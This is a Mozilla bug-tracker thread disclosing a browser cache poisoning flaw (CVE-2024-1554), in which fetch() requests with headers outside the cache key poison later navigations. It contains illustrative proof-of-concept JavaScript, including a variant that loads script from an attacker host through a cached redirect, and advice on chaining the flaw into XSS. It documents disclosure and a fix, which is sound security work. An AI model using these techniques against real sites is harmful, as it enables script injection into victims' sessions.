Closed Bug 1816390 (CVE-2024-1554) Opened 2 years ago Closed 1 year ago

Browser cache poisoning attack using fetch() with different headers

Categories

(Core :: Networking: Cache, defect, P2)

Version: Firefox 109
Type: defect

Tracking


RESOLVED FIXED
123 Branch
Tracking Status
firefox-esr115 --- wontfix
firefox121 --- wontfix
firefox122 --- wontfix
firefox123 --- fixed

People

(Reporter: martin.oneal, Assigned: valentin)


Details

(Keywords: reporter-external, sec-moderate, Whiteboard: [necko-triaged][necko-priority-queue][adv-main123+])

Attachments

(3 files)

User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0

Steps to reproduce:

TL;DR

If the right set of circumstances is present, Fetch can be used to pre-load the browser's private cache and poison normal navigation. Using this approach, a range of attacks that were previously thought to be unexploitable can be unlocked and made practical. Hurrah!

Blah Blah Blah

This works because the browser shares the private cache between Fetch and normal navigation, with the cache key based upon the URI and originating context. However, because Fetch can add headers to the request that vary the response (but which are not included in the cache key), an attacker can pre-request resources to poison the private cache, then force the browser to navigate to the page, which activates the attack.
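In rough code, the flow looks something like this (the endpoint and header name here are illustrative assumptions, not the actual PoC):

    // Step 1: pre-load the private cache via fetch, using a header that
    // changes the response but is not part of the cache key.
    await fetch('https://victim.example/page', {
      headers: { 'x-original-url': '/attacker-controlled' },
    });

    // Step 2: force a normal navigation to the same URI; the browser now
    // serves the poisoned entry from its cache instead of the network.
    location.href = 'https://victim.example/page';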

To make this work requires two things:

  • The Fetch request and response must be cacheable under normal circumstances by the browser. Typically this means a GET method, with a response that is implicitly cacheable (a 301/308 status code and a last-modified header) or explicitly cacheable (cache-control, pragma and expires headers).

  • The target endpoint must pass a pre-flight check, as adding additional headers to a Fetch request requires CORS.

As an interesting observation, the response does not always have to be made available to Fetch for the browser cache to be updated. For example, if the pre-flight passes, but the actual response does not have an access-control-allow-origin header, then it will be blocked due to CORS. But even so, the cache will sometimes still be updated successfully.

Recommendations

It is recommended that additional information be added to the cache key, so that requests made by Fetch and normal navigation are separated.

PoC

The following PoC links launch same-origin, same-site and cross-origin tests, either directly or from within an iframe with a data: URI (to force a null origin).

301 status code (direct)

200 status code (direct)

301 status code (iframe)

200 status code (iframe)

Actual results:

as above

Expected results:

as above

(In reply to scarlet from comment #0)

If the right set of circumstances is present, Fetch can be used to pre-load the browser's private cache and poison normal navigation. Using this approach, a range of attacks that were previously thought to be unexploitable can be unlocked and made practical. Hurrah!

What do you mean by "private cache" and "normal navigation" here? And can you give an example of an attack made possible by this issue?

Group: firefox-core-security → network-core-security
Component: Untriaged → Networking: Cache
Flags: needinfo?(martin.oneal)
Product: Firefox → Core

Caches tend to fall into two buckets, private caches (the one in the browser) and shared caches (proxies, accelerators etc). Details here: https://developer.mozilla.org/en-US/docs/Web/HTTP/Caching

The reference to "normal navigation" is just to make a distinction between Fetch and normal browser activity: following a link, loading resources from within a page etc.

Cache poisoning is a technique for planting an attack in a cache so that it is activated by the next access. Generally this targets a shared cache (poison once, attack many), but the bug described here works just as well for targeting the private cache in the browser. Details here (shared cache attacks, but the principle works just the same): https://portswigger.net/research/practical-web-cache-poisoning

So this kind of attack is great for unlocking a range of vulnerabilities in a site (such as XSS) that otherwise can't be practically exploited.

Hopefully that helps!

Flags: needinfo?(martin.oneal)

Could you explain what the PoC does? How does it actually work for every request? I would have expected network state partitioning to be a good mitigation against cache poisoning.

Severity: -- → S3
Priority: -- → P1
Whiteboard: [necko-triaged][necko-priority-review]

my pleasure!

The PoCs are all very similar, and work in the same way: first they make a request using Fetch (with a header that alters the response but isn't part of the cache key), then they follow up with normal navigation to the same URI. Because the response is cacheable, the second navigation step loads the response from cache (and doesn't make a new request).

The PoCs are broken into three CORS clumps: same origin (literally the same host), same site (they share a base domain, like mozilla.org) and cross site (the domains are unrelated).

Then on top of this, the PoCs are also split into direct requests (just made from a page) and others that are wrapped inside an iframe (as this forces the origin of the request to null).

And finally, the PoCs are separated into responses that generate a 200 and a 301 (though a 308 will work the same way: basically a permanent, inherently cacheable redirect).

The idea is that these tests permute the main combinations and demonstrate whether the browser cache can be poisoned.
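As a sketch of the iframe variant: the wrapper is just a data: URI, which gives the embedded code a null origin (URLs and header are illustrative, not the actual PoC code):

    // Run the poisoning fetch inside a data: iframe so the request's
    // Origin header is "null" rather than the page's origin.
    const inner =
      "fetch('https://victim.example/page', " +
      "{ headers: { 'x-original-url': '/attacker-controlled' } });";
    const frame = document.createElement('iframe');
    frame.src = 'data:text/html,' +
      encodeURIComponent('<script>' + inner + '<' + '/script>');
    document.body.appendChild(frame);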

Have you tried safari and chrome yet? ;)

As an aside, a MITM proxy like Charles or Burp will make the mechanics of the actual requests much more clear.

(In reply to scarlet from comment #4)

Have you tried safari and chrome yet? ;)

Looks like Chrome at least reports "poisoned: yep" for at least some of those - I assume you've also reported to Chrome and Safari (if they too are vulnerable) as well, and if so, can you link the reports? :-)

Flags: needinfo?(martin.oneal)
Summary: Private cache poisoning attack → Browser cache poisoning attack using fetch() with different headers

Haha, indeed reported elsewhere too.

I've found cross-browser bugs before, so happy to reference tickets across vendors. I know chrome are too, but Apple (as ever) generally give pretty much no feedback prior to releasing a patch, so I wouldn't expect anything. ;)

Flags: needinfo?(martin.oneal)

there is the potential for this to become a whatwg issue, given the cross-browser aspect.

If the server is returning different values based on the headers, doesn't it fall on the server to issue a Vary: header for those?

Status: UNCONFIRMED → NEW
Ever confirmed: true
Flags: needinfo?(valentin.gosu)

(In reply to Daniel Veditz [:dveditz] from comment #10)

If the server is returning different values based on the headers, doesn't it fall on the server to issue a Vary: header for those?

Yes, it does. As far as I can tell, none of the requests to links in comment 0 are returning a Vary header.

Flags: needinfo?(valentin.gosu)

Oh yes, the standards have a mechanism for dealing with this, but the reality is that it just isn't used particularly widely (in this way).

The typical approach to avoid cache poisoning is to include one or other of referer and origin in the vary response, but as this is a private cache, they are going to be the same anyway.

(In reply to scarlet from comment #12)

Oh yes, the standards have a mechanism for dealing with this, but the reality is that it just isn't used particularly widely (in this way).

The typical approach to avoid cache poisoning is to include one or other of referer and origin in the vary response, but as this is a private cache, they are going to be the same anyway.

(In reply to scarlet from comment #0)

But in this case the server is returning a different response based on the x-original-url header, so presumably it should include that in the Vary response?
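For illustration, a minimal Node.js server doing that might look like the following (the header name matches the PoC; everything else is assumed):

    const http = require('http');

    http.createServer((req, res) => {
      // The response differs based on x-original-url, so declare it in
      // Vary; any cache must then include that header in its key.
      res.setHeader('Vary', 'x-original-url');
      res.setHeader('Cache-Control', 'max-age=3600');
      const override = req.headers['x-original-url'];
      res.end(override ? `view for ${override}` : 'default view');
    }).listen(8080);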

in my experience, for anything other than the most simple install, there really isn't anything you can point to as a server. There will be a stack of infrastructure and application components, each with rules about what to allow, and what extra headers to add to responses.

so the bit that will respond to the x-original-url header will be the app component (or framework), whereas other than the basic 200 responses, the cache headers will actually be applied by middleware, the framework, a webserver, or maybe a WAF, reverse proxy or firewall.

a lot of this stuff doesn't even consider the caching aspect: take the 301/308s, for example. They'll be sent as-is, with no extra headers, and it is the browser that inherently caches them.

I ran some more testing using service workers this weekend.

The results are the same as for the direct PoCs previously provided:

301 status code (service worker)

200 status code (service worker)
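A minimal sketch of what the service-worker variant might look like (header name and behaviour are assumptions, not the actual PoC code; this assumes subresource fetches, since re-constructing a navigation request resets its mode):

    // sw.js: re-issue each request with the cache-key-invisible header added.
    self.addEventListener('fetch', (event) => {
      const poisoned = new Request(event.request, {
        headers: { 'x-original-url': '/attacker-controlled' },
      });
      event.respondWith(fetch(poisoned));
    });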

I also noticed a strange quirk with the same-origin 200 response: if the response has a cache-control: no-cache, no-store header then the first time it is requested, it fails as expected. However, subsequent requests succeed. This is only for same-origin; the others are unaffected.

As with the other same origin stuff, it's not that useful as an exploit. However, it does hint at something else being broken.

ignore the reload bit: my code was broken (it didn't activate properly immediately). so same-origin via a service worker ignores cache settings.

I also noticed a strange quirk with the same-origin 200 response: if the response has a cache-control: no-cache, no-store header then it is successfully cached. This is only for same-origin; the others are unaffected.

As with the other same origin stuff, it's not that useful as an exploit. However, it does hint at something else being broken.

and just for clarity, that's via the service worker only: direct requests are not cached as expected.

Severity: S3 → S2
Priority: P1 → P2

(In reply to scarlet from comment #9)

there is the potential for this to become a whatwg issue, given the cross-browser aspect.

Hi Anne,

Should we open a fetch security advisory for this issue?

Thanks!

Flags: needinfo?(annevk)

I'm not a subject matter expert, but to me it seems more of an implementation thing than a standards thing. All the main browsers (and even recent versions) respond differently, as they seem to use a subtly different approach to deciding how to generate the cache key.

As a layman, for this particular issue, adding a flag for whether the fetch request is initiated from javascript or not would seem to solve the problem.

I ran up some more tests last night, and bodyless POSTs (via an override header) work just fine too.

This is very useful in the real world, for leveraging XSS that has previously been unexploitable because it requires CORS (auth headers, cookie- or header-based XSS etc).

301 status code (direct, bodyless post)

200 status code (direct, bodyless post)
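The shape of those tests is roughly as follows (the override header name is an assumption; x-http-method-override is a common convention):

    // On the wire this is a cacheable, bodyless GET, but the application
    // stack treats it as a POST because of the override header.
    await fetch('https://victim.example/endpoint', {
      method: 'GET',
      headers: { 'x-http-method-override': 'POST' },
    });
    location.href = 'https://victim.example/endpoint';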

The boundary we are trying to protect is top-level cross-site. That's done through HTTP cache partitioning. Top-level cross-site tests don't seem to work so I think all is working as designed?

Servers could use Fetch Metadata Request Headers if they need control within the site boundary.
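For example, a hypothetical server-side guard using those headers might look like this (Node.js sketch; handler name and policy are illustrative):

    // Refuse scripted cross-site requests; top-level navigations
    // (Sec-Fetch-Mode: navigate) are allowed through.
    function fetchMetadataGuard(req, res) {
      const site = req.headers['sec-fetch-site']; // same-origin | same-site | cross-site | none
      const mode = req.headers['sec-fetch-mode']; // navigate | cors | no-cors | ...
      if (site === 'cross-site' && mode !== 'navigate') {
        res.writeHead(403);
        res.end();
        return false;
      }
      return true;
    }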

Valentin, feel free if you think there are changes we should make. I don't see anything actionable here personally.

Flags: needinfo?(annevk)

is there a plan and schedule for getting a fix together and shipped?

I've started working on this. We don't have a timeline for shipping a fix yet.

Assignee: nobody → valentin.gosu

cool. thanks for the update!

what approach have you taken? will you be adding a flag to the cache key for fetch-javascript, ala iframe?

Flags: needinfo?(valentin.gosu)

Sorry for the long response delay - I'm working on the patch to add a fetch flag to the partitioning key.
Most of my time is occupied by another project, but that's ramping down this week so I'll probably have something to share by the end of next week. Thank you for your patience.
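Conceptually (this is a sketch of the idea, not Gecko code), the isolation key gains one extra dimension:

    // Pseudocode: requests for the same URI no longer collide in the
    // cache when one comes from fetch() and the other from navigation.
    function cacheIsolationKey(uri, topLevelSite, initiatedByFetch) {
      return `${topLevelSite}|fetch=${initiatedByFetch ? 1 : 0}|${uri}`;
    }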

Flags: needinfo?(valentin.gosu)

cool. just checking it hasn't been forgotten ;)

Whiteboard: [necko-triaged][necko-priority-review] → [necko-triaged][necko-priority-next]

Valentin, if you don't think this is WONTFIX could you please discuss the relevant standard changes in tandem with any fix? It's still not clear to me this is worth fixing at all.

There's a really good primer for cache poisoning here: https://portswigger.net/web-security/web-cache-poisoning

The only difference is that the poisoning happens within the browser's private cache (and not a shared cache, as in the link), but otherwise all the principles and effects are the same.

I've been having a lot of fun with it in the last few months, as it unlocks a collection of attacks that have previously been unexploitable.

if the pre-flight passes, but the actual response does not have an access-control-allow-origin header, then it will be blocked due to CORS. But even so, the cache will sometimes still be updated successfully.

Is there a way we can avoid caching these failed responses ever? We do, though, want to cache the pre-flight responses for a time for perf reasons, but maybe these can be tagged to only be used for pre-flights and nothing else?

Keywords: sec-other
Whiteboard: [necko-triaged][necko-priority-next] → [necko-triaged][necko-priority-queue]

As an example of how this can be used in the real world, if you can find a site with the following criteria, then you have a universal XSS flaw:

  • javascript files
  • pre-flight response with * for origin and headers
  • responds to host/protocol override headers (typically a 301)

So to exploit it, you use the fetch to pre-load the cache, then navigate to the site, which uses the cached redirect to load malicious javascript.
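In rough code, that exploit looks something like this (all names and the override header are illustrative):

    // Step 1: poison the cached redirect for the site's script URL.
    await fetch('https://victim.example/static/app.js', {
      headers: { 'x-forwarded-host': 'attacker.example' }, // assumed override header
    });

    // Step 2: navigate; the page requests app.js, hits the poisoned 301
    // in the cache, and loads the attacker's script instead.
    location.href = 'https://victim.example/';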

Hi Scarlet, I'm sorry for the delay here.
I'm trying to verify if the addition of a fetch flag to the isolation key fixes this issue, but your links don't work anymore.
Could you possibly upload the sources of the test cases? It would make it much easier to reason about the correctness of the behaviour.

That said, I'm wondering what the status of the Chrome bug is. Did they address it in any way?

Flags: needinfo?(martin.oneal)

haha, as far as I know, it's all still queued with everyone.

yeah, the test cases were decommissioned a while back: this was reported 7 months ago. ;)

Flags: needinfo?(martin.oneal)

I reinstated the test cases, and some are still failing:

http://a.gvj.io/
http://a.gvj.io/iframe

Added a test for 308s, and these can be poisoned cross-site, which is a fun plot-twist. ;)

actually, ignore me: typo in the test code.

as far as I can see, the caching is now fixed in line with what I'd expect.

all the iframe poisoning is now blocked.

embed, object and direct poisoning is limited to same-origin, but that is in line with the cache partition strategy.

Do you agree that it is fixed?

http://a.gvj.io/
http://a.gvj.io/iframe
http://a.gvj.io/embed
http://a.gvj.io/object

chrome and safari still have broken test cases though, so please hold off on any announcement.

Hi Scarlet, I don't think we made any changes to fetch caching recently.
Either the new test cases are wrong, or the previous ones were.

I'm confident the test cases are right: they still show consistent results on the other browsers.

It's obviously 9 months ago now, but IIRC when I originally logged the bug, some of the iframe tests were failing, as all the fetch requests shared the same null origin.

That no longer seems to be the case.

I used mozregression to check Firefox 109 with the new test cases, and I get the exact same values as with the latest version. Please let me know if you're seeing something different.
https://mozilla.github.io/mozregression/quickstart.html

mozregression -b 109 --find-fix

Status: NEW → RESOLVED
Closed: 2 years ago
Resolution: --- → FIXED

yep, re-downloaded 109 and seeing the same thing.

I had closed the bug by mistake.

Severity: S2 → S3
Status: RESOLVED → REOPENED
Resolution: FIXED → ---
Whiteboard: [necko-triaged][necko-priority-queue] → [necko-triaged][necko-monitor]

so, the bits that are left are that you can poison the navigation same-site using fetch, which isn't vastly useful in the real world (as delivering it requires another, more serious issue in the site).

Note that I downgraded the bug to S3 considering comment 43 and comment 46.
We'll keep the bug open in order to determine if there is an actual vulnerability here, or if the original testcases were failing for a different reason.

it's possible.

the original test cases spawned an iframe, then ran the test within it. the current ones wrap the whole test suite in a single iframe.

I've found notable differences between browsers based on how the navigation is triggered too: location.replace or an A element onclick have different results.

so, I went back to my original notes and found that firefox only poisoned the normal navigation cache if the Access-Control-Allow-Credentials header was present in the responses. with the headers reinstated, the current code now poisons cross-site within an iframe. pow!

http://a.gvj.io/iframe

you may want to reprioritise the bug and fix that. ;)
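For reference, the reinstated combination looks roughly like this (URLs and header are illustrative; the operative part is the server responding with Access-Control-Allow-Credentials: true on both the pre-flight and the response, and the credentials mode here is an assumption):

    await fetch('https://victim.example/page', {
      credentials: 'include', // assumed, to make the credentials header meaningful
      headers: { 'x-original-url': '/attacker-controlled' },
    });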

I've put together a draft write-up for the issue (this isn't publically visible yet):
https://attackshipsonfi.re/p/72fd0b4c-b173-4fdd-9d8f-d5a2e82e6033

Ni Valentin for a re-triage given the last few comments.

Flags: needinfo?(moz.valentin)
Status: REOPENED → ASSIGNED
Flags: needinfo?(moz.valentin)
Whiteboard: [necko-triaged][necko-monitor] → [necko-triaged][necko-priority-queue]

Hi Scarlet,

http://a.gvj.io/iframe

So Sunil and I worked on this bug today, and we confirmed that adding an extra flag to the cacheKey when the request is caused by a fetch fixes the iframe test case.

But when we started to work on writing tests for this we started to think about the implications of this attack.
So attacker.com does a fetch request that poisons the cache, then includes an iframe to target.com that is then loaded from the cache. Since the cache, cookies and site data are keyed by the top-level domain, there is no user-specific info that can be obtained from getting the iframe to load the wrong content.

If the cross-site cache poisoning worked for http://a.gvj.io/direct it would indeed be a lot more worrisome.
But for iframes, I don't think there's anything the attacker could get from the iframe. Do you have a different view of this? Or is there some attack vector I'm not seeing?

Flags: needinfo?(martin.oneal)

for a vanilla iframe, where you are looking to isolate the two contexts, then yup, direct and iframe are isolated.

but in this case, say the exploit we're targeting is an XSS, that means we're running our code inside the iframe, and also outside, which means we can pass data between them through window messages etc. and because we're not looking to isolate them, the parent window can subsequently add allow-same-origin to the iframe sandbox, after the initial navigation that activates the exploit.
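A rough sketch of that chaining (illustrative only; assumes the injected script in the frame posts messages back to its parent):

    // Parent page: receive data from the injected script in the frame.
    window.addEventListener('message', (event) => {
      console.log('from poisoned frame:', event.data);
    });

    const frame = document.querySelector('iframe');
    // Sandbox tokens take effect on the frame's next navigation, so
    // relax the sandbox after the poisoned load and renavigate.
    frame.sandbox.add('allow-same-origin', 'allow-scripts');
    frame.src = frame.src;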

Flags: needinfo?(martin.oneal)

That still doesn't explain what an attacker could steal from the iframe. You need an extra step where the iframe has access to either cookies or some other sensitive resource that is only accessible to the victim.
Otherwise there is functionally no difference between you, the attacker loading http://a.gvj.io/iframe in your browser and the victim loading http://a.gvj.io/iframe in theirs. Or maybe there's a more creative way of making the iframe share data with a top level window of the same domain.

it's not about stealing directly.
a successful attack is often an attack-chain, gluing multiple issues together.
so the successful poisoning enables javascript running in the target site DOM.
from there, you can chain it with a raft of other issues that leverage the same-site scope, or move from the null partition to direct.

what's the plan for pushing the code?

(In reply to Valentin Gosu [:valentin] (he/him) from comment #58)

That still doesn't explain what an attacker could steal from the iframe. You need an extra step where the iframe has access to either cookies or some other sensitive resource that is only accessible to the victim.

There could be a "popup" from the iframe that, still partitioned, lets users log into the iframed site. Or the target site could have used the Storage Access API to get unpartitioned cookies. But even if the cookies are partitioned, don't underestimate the ability of clever hackers to find some way to exploit this difference. It would be very site specific of course, and probably rare to get the conditions to line up, but definitely could be a problem.

Going back to the thinking behind the CORS pre-flight, there are some fetch/xhr requests that look and behave exactly like requests that could already be made from unscripted HTML elements. Those don't need a pre-flight because the server already has to handle those requests; we only need CORS to know whether to let the script read the response or not. Other requests—like ones that add a header!—can only be done using fetch/xhr. We need to do a pre-flight to know if we're even allowed to MAKE the request, let alone read the response.

Adding a cache flag to distinguish "initiated by HTML" from "scripted and needed a pre-flight" not only seems like a workable fix, I think the fundamental theory of CORS requires it. If the theory I'm presenting holds any water then fetch requests that did not need a pre-flight should be cached and shared with web content rather than with requests that required a pre-flight. In most cases it probably doesn't matter either way (other than one way taking up more space), but I feel vaguely uneasy that browser engines should agree on the same behavior here and write it into the Fetch spec. Maybe some old site tries to use scripted fetch to "pre-load" resources to speed up the next page, and segregating the cache would defeat that (never mind that we have better dedicated features to do that these days). ¯\_(ツ)_/¯
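To make the distinction concrete (the URL is hypothetical):

    // HTML-equivalent: a simple request an <img> or form could already
    // send; no pre-flight, script just can't read the response.
    fetch('https://other.example/resource');

    // Scripted-only: the extra header makes the request non-simple, so
    // the browser must pre-flight before sending it at all.
    fetch('https://other.example/resource', {
      headers: { 'x-custom': '1' },
    });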

Daniel, it's not entirely clear to me how that theory holds given top-level site HTTP cache partitioning, and as such the poisoning you can do is very limited and restricted to the same site. I still haven't seen anything that invalidates comment 23.

I'm inclined to agree with Daniel as to the standard, as all three browser stacks have implemented the functionality differently.

Does that not (in itself) say something in the standard isn't clear?

Also, if you look at http://a.gvj.io/iframe you can see that the navigation is poisoned cross-site just fine.

Did affect chromium, but they've fixed it since it was originally reported. Still affects firefox (patch as above) and safari.

scarlet, I don't see how that demo proves anything with regards to that as there's no top-level cross-site navigation. Chromium has additional cache keying beyond top-level site and maybe you discovered a flaw in that, but Gecko and WebKit don't as far as I know. And yes, that means some same-top-level-site attacks work in Gecko and WebKit and those should (eventually) be addressed, but that's been a known bug for quite a while.

well, there are a few problems as far as I can see.

the first is the fact that fetch/xhr share the cache with normal browser operations at all. the reason this is a problem is that fetch/xhr allow you to add headers to the request that do not inherently get included within the cache key. adding a flag that differentiated between fetch/xhr and regular browser operations would solve this globally.

the second is that the partitioning implementation is patchy. some browsers partition strictly on origin, and some on site (eTLD+1). this is a critical issue, as for large sites, the attack surface is huge. this discrepancy enables an attacker to jump laterally from unloved.mozilla.org to www.mozilla.org. I think you chaps need to make a call on this, and update the standards to match.

the third is the universal equivalence of the null origin with the partitioning. it is common to use an iframe wrapper for thirdparty code (for example embedding tweets in your site). if a vulnerability can be found in twitter, then an attacker can pre-seed using fetch, and then use your page with the embedded tweet to activate the attack. adding a flag that separates the null origin would solve this globally (as firefox have done).

the fourth is that when making the fetch/xhr request, the pre-flight obviously has to succeed for the regular request to be attempted, but if the response fails the CORS check, then the HTTP cache is updated anyway. you chaps may want to reverse the order of those operations, so that only successful requests are cached.
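for that fourth point, the reordering in pseudocode (not actual browser internals; the helpers are hypothetical):

    // Perform the CORS check before committing to cache, so a response
    // that fails CORS never lands in the shared HTTP cache.
    async function fetchAndMaybeCache(request) {
      const response = await networkFetch(request);      // hypothetical helper
      if (passesCorsCheck(request, response)) {          // hypothetical helper
        httpCache.store(cacheKeyFor(request), response); // cache only on success
      }
      return response;
    }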

I would have thought that some or all of those were whatwg standards things, no?

Is there an ETA for shipping the patched version?

There is an r+ patch which didn't land and no activity in this bug for 2 weeks.
:valentin, could you have a look please?
If you still have some work to do, you can add an action "Plan Changes" in Phabricator.
For more information, please visit BugBot documentation.

Flags: needinfo?(moz.valentin)
Flags: needinfo?(kershaw)
Flags: needinfo?(kershaw)

(In reply to scarlet from comment #68)

Is there an ETA for shipping the patched version?

I'll try to land it sometime this week.

Flags: needinfo?(moz.valentin)

cool, ta

Hey chaps,

since the last time I looked (admittedly a few months back), there have been a couple of changes to the way firefox poisons:

  • same-site now works for direct (was only same-origin)
  • 303s don't cache at all

is that a deliberate change in behaviour, or a side effect of another change in partitioning/caching that has been pushed?

Pushed by valentin.gosu@gmail.com: https://hg.mozilla.org/integration/autoland/rev/94ed4d6361b3 Partition the cache entries generated by cross-origin fetch requests r=necko-reviewers,kershaw,jesup
Group: network-core-security → core-security-release
Status: ASSIGNED → RESOLVED
Closed: 2 years ago → 1 year ago
Resolution: --- → FIXED
Target Milestone: --- → 123 Branch

can you please tag this bug for a bounty? TIA

Flags: sec-bounty?

thanks!

QA Whiteboard: [post-critsmash-triage]
Flags: qe-verify-
Flags: sec-bounty? → sec-bounty+
Whiteboard: [necko-triaged][necko-priority-queue] → [necko-triaged][necko-priority-queue][adv-main123+]
Attached file advisory.txt
Alias: CVE-2024-1554
Group: core-security-release
